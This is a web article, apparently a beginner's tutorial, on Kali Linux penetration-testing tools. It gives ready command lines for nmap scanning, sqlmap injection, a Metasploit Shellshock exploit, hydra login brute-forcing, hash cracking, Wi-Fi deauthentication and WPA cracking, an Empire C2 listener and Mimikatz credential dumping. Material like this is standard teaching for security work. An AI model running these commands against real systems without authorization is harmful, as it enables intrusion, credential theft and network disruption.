Kali Linux Hacking Tools Complete Guide — Nmap, Metasploit, Burp Suite | Vaarta

What is Kali Linux?

Kali Linux is a Debian-based distribution designed for digital forensics and penetration testing. It comes with 600+ pre-installed security tools.

Installing Kali Linux

Option 1: Virtual Machine (Recommended for Beginners)

1. Download VirtualBox from https://virtualbox.org

2. Download Kali from https://kali.org/get-kali

3. Create new VM with 4GB RAM, 50GB disk

4. Install Kali from ISO

Option 2: WSL2 (Windows Subsystem for Linux)

```powershell

wsl --install -d kali-linux

Option 3: Dual Boot

Install alongside Windows for best performance.

Essential Tool Categories

1. Information Gathering

**Nmap** - Network Scanner

```bash

nmap -sV -sC target.com # Version detection + default scripts

nmap -A -p- target.com # Aggressive scan, all ports

nmap --script vuln target.com # Vulnerability scan

**Recon-ng** - Reconnaissance Framework

```bash

recon-ng

workspaces create target

modules load recon/domains-hosts/brute_force

**theHarvester** - Email/Subdomain Enumeration

```bash

theHarvester -d target.com -b google,bing,linkedin

2. Vulnerability Analysis

**OpenVAS** - Full Vulnerability Scanner

```bash

openvas-setup

openvas-start

# Access at https://127.0.0.1:9392

**Nikto** - Web Server Scanner

```bash

nikto -h target.com

nikto -h target.com -p 8080 # Custom port

3. Web Application Analysis

**Burp Suite** - Web Application Proxy

```bash

# Start Burp Suite

burpsuite

# Configure browser proxy: 127.0.0.1:8080

**OWASP ZAP** - Automated Scanner

```bash

# Start ZAP

zaproxy

# Import target URL and run scan

**SQLMap** - SQL Injection

```bash

sqlmap -u "https://target.com/page?id=1" --dbs

sqlmap -u "https://target.com/login" --data="user=admin&pass=test" --dbs

4. Exploitation Tools

**Metasploit Framework**

```bash

msfconsole

search apache

use exploit/multi/http/apache_mod_cgi_bash_env_exec

set RHOSTS target.com

exploit

**Searchsploit** - Exploit Database

```bash

searchsploit apache 2.4.49

searchsploit -m 50383 # Download exploit

5. Password Attacks

**John the Ripper**

```bash

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

john --show hash.txt # Show cracked passwords

**Hashcat**

```bash

hashcat -m 0 hash.txt rockyou.txt # MD5 cracking

hashcat -m 1000 hash.txt rockyou.txt # NTLM cracking

**Hydra**

```bash

hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"

6. Wireless Testing

**Aircrack-ng**

```bash

airmon-ng start wlan0 # Enable monitor mode

airodump-ng wlan0mon # Capture packets

aireplay-ng -0 5 -a [BSSID] wlan0mon # Deauth attack

aircrack-ng -w wordlist.txt capture.cap # Crack password

**Wifite**

```bash

wifite # Automated wireless attack

7. Post-Exploitation

**Empire** - C2 Framework

```bash

uselistener http

execute

**Mimikatz** - Credential Extraction (Windows)

```bash

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

8. Forensics

**Wireshark** - Packet Analysis

```bash

wireshark # GUI interface

tshark -r capture.pcap # Command line

**Autopsy** - Digital Forensics

```bash

autopsy # Start GUI

Daily Workflow

1. **Recon**: Nmap, theHarvester, Recon-ng

2. **Scan**: OpenVAS, Nikto

3. **Test**: Burp Suite, SQLMap

4. **Exploit**: Metasploit

5. **Escalate**: Mimikatz, Empire

6. **Report**: Document findings

Tips for Beginners

1. **Start with basics**: Learn Linux commands first

2. **Practice on legal targets**: Use HackTheBox, TryHackMe

3. **Read documentation**: Each tool has extensive docs

4. **Join communities**: Reddit, Discord, forums

5. **Document everything**: Keep a learning journal

Conclusion

Kali Linux is the Swiss Army knife of cybersecurity. Master these tools and you'll be well-equipped for security testing.